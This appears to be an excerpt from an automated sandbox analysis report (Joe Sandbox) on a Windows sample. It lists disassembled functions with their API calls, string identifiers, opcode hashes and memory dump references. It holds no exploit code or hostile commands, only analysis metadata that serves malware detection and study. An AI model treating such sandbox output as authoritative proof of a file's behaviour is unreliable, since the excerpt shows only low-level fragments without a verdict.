                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Timer$Kill
                                                                                                                                                                                                                                                                                    • String ID: 3401028$3401029
                                                                                                                                                                                                                                                                                    • API String ID: 3307318486-3858196228
                                                                                                                                                                                                                                                                                    • Opcode ID: 0b4dd37929f5e26d15ed35f99a3ff5d0f5e2dd061a2436d59f470f072d9acaa2
                                                                                                                                                                                                                                                                                    • Instruction ID: 02bff0ae68159748c7f69b0dc43338cfbe1eaa20307d0c92b455edf88c414399
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b4dd37929f5e26d15ed35f99a3ff5d0f5e2dd061a2436d59f470f072d9acaa2
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 481184B574470097C3209B64DC81FEAB3A56F88750F20871FF26FA72D1C7A4B8419788
                                                                                                                                                                                                                                                                                    Function 0040DE10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetRectEmpty.USER32(0000000C), ref: 0040DE94
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: EmptyRect
                                                                                                                                                                                                                                                                                    • String ID: Button$CDoubleDraw$Default
                                                                                                                                                                                                                                                                                    • API String ID: 2270935405-580154339
                                                                                                                                                                                                                                                                                    • Opcode ID: 46be97038f1fb4e2fb67b84b2aff2fccaa5b1abb12b68c42fd26aa523238d7ea
                                                                                                                                                                                                                                                                                    • Instruction ID: ef19d2a367d3f1db560aaf5cf05e81b0258e296f30c95c9ac20d7302b86fa88f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 46be97038f1fb4e2fb67b84b2aff2fccaa5b1abb12b68c42fd26aa523238d7ea
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C611ABB1A447119BD3109F56CC42B97B6E8EB48B24F108A2FF519E72C1D7BC680447DD
                                                                                                                                                                                                                                                                                    Function 0046C4F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • BeginDeferWindowPos.USER32(?), ref: 0046C51A
                                                                                                                                                                                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0046C576
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 0046C58F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$Defer$BeginRedraw
                                                                                                                                                                                                                                                                                    • String ID: Button_Check
                                                                                                                                                                                                                                                                                    • API String ID: 2284443614-1860365581
                                                                                                                                                                                                                                                                                    • Opcode ID: 14033b2483b76df541bdd5ba0729d94ec0d0f5cbc8963acbd48a3d1fb77fda02
                                                                                                                                                                                                                                                                                    • Instruction ID: 5655fd99f899ac16fa463449df691d44eb2f3411b94b0263f5d23efcf872a4b1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 14033b2483b76df541bdd5ba0729d94ec0d0f5cbc8963acbd48a3d1fb77fda02
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F21EDB4600702AFC310CF29C984A16FBE4BB88310F148A5EE59997261E734F945CB96
                                                                                                                                                                                                                                                                                    Function 0041E1D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • mciSendCommandW.WINMM ref: 0041E210
                                                                                                                                                                                                                                                                                    • mciGetErrorStringW.WINMM(00000000,?,00000080), ref: 0041E23D
                                                                                                                                                                                                                                                                                    • mciSendCommandW.WINMM(00000001,00000806,00010000,?), ref: 0041E26C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CommandSend$ErrorString
                                                                                                                                                                                                                                                                                    • String ID: %s/n
                                                                                                                                                                                                                                                                                    • API String ID: 1543859921-1476993579
                                                                                                                                                                                                                                                                                    • Opcode ID: aa738c2a78bdc81aa820eca9ca993c19fc7cc6af9e6a9e3a721ceb691594f208
                                                                                                                                                                                                                                                                                    • Instruction ID: bb7bdc0f92cc2694eaa6ee34f7bcc843a23ee59e2d49304dadf9c875fa4d5d80
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa738c2a78bdc81aa820eca9ca993c19fc7cc6af9e6a9e3a721ceb691594f208
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04118671504301BBD360EB54DC46FEFB7E8AF88714F00492EF589D7290E67495588796
                                                                                                                                                                                                                                                                                    Function 004014C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50filewindowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00401190: EnterCriticalSection.KERNEL32(00497DC0,00000000,?,?,?,?,?,004014CD,?,?), ref: 00401199
                                                                                                                                                                                                                                                                                      • Part of subcall function 00401190: GdiplusStartup.GDIPLUS(00497DBC,?,?,?,?,?,?,?,004014CD,?,?), ref: 004011CD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00401190: LeaveCriticalSection.KERNEL32(00497DC0,?,?,?,?,?,004014CD,?,?), ref: 004011DD
                                                                                                                                                                                                                                                                                    • GdipCreateBitmapFromFile.GDIPLUS ref: 004014FA
                                                                                                                                                                                                                                                                                    • GdipDisposeImage.GDIPLUS(?), ref: 0040152C
                                                                                                                                                                                                                                                                                    • GdipDisposeImage.GDIPLUS(00000000), ref: 00401559
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Gdip$CriticalDisposeImageSection$BitmapCreateEnterFileFromGdiplusLeaveStartup
                                                                                                                                                                                                                                                                                    • String ID: >=
                                                                                                                                                                                                                                                                                    • API String ID: 1500692541-3263226258
                                                                                                                                                                                                                                                                                    • Opcode ID: e9dd88c38cb5ca4bc35da1630157e35e7d1ec6af077491dd45c27da34a03c788
                                                                                                                                                                                                                                                                                    • Instruction ID: 2a3b4bfc414dc10881e7eec236f3a1e04021e9235cedc72d475739dca07e05aa
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9dd88c38cb5ca4bc35da1630157e35e7d1ec6af077491dd45c27da34a03c788
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C01A5725043119BC710EF18D885AEFB7E8BFC4358F04892EF588AB260D738DA09C796
                                                                                                                                                                                                                                                                                    Function 00415240 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00415319,?,?,113262B6,?,?,00000000,113262B6,?,113262B6,?,00000000,00000000), ref: 00415253
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00415264
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ImageList_GetImageInfo), ref: 0041527E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                    • String ID: ImageList_GetImageInfo
                                                                                                                                                                                                                                                                                    • API String ID: 310444273-158344479
                                                                                                                                                                                                                                                                                    • Opcode ID: 631ada8aa74ce3b6fe86c1b860eda6107006effdbef0132884d037a0fc17c542
                                                                                                                                                                                                                                                                                    • Instruction ID: f55cdba9153e0e1c980a4fac1fe1aa85c7dcce68075fab81bff91a96374b76ea
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 631ada8aa74ce3b6fe86c1b860eda6107006effdbef0132884d037a0fc17c542
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EF0B275A00B41DFDB208FB8D848B82B7E4AB58715F00C82EA5AEC3611D738E480CF14
                                                                                                                                                                                                                                                                                    Function 004153C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00415489,?,?,113262B6,?,?,00000000,004070E8,?,113262B6,?,00000000,00000000), ref: 004153D0
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 004153E1
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ImageList_GetImageCount), ref: 004153FB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • ImageList_GetImageCount, xrefs: 004153F5
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                    • String ID: ImageList_GetImageCount
                                                                                                                                                                                                                                                                                    • API String ID: 310444273-4246500564
                                                                                                                                                                                                                                                                                    • Opcode ID: dc0ca7fa63d95de86685858bef82a952b7d7d020cd01d86cad7104e1fbda7d34
                                                                                                                                                                                                                                                                                    • Instruction ID: 982047e8d717f41167e3cd9be7dffe01ffe3abe97b222393831f80d9b05f459f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc0ca7fa63d95de86685858bef82a952b7d7d020cd01d86cad7104e1fbda7d34
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 08F07475601B45CFD7208F68D948A87B7E4FB58715B40892EE5AEC3A51D778E880CB08
                                                                                                                                                                                                                                                                                    Function 00403D90 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,00403E46,?,?,113262B6), ref: 00403DA0
                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00403DB1
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,ImageList_AddMasked), ref: 00403DCB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
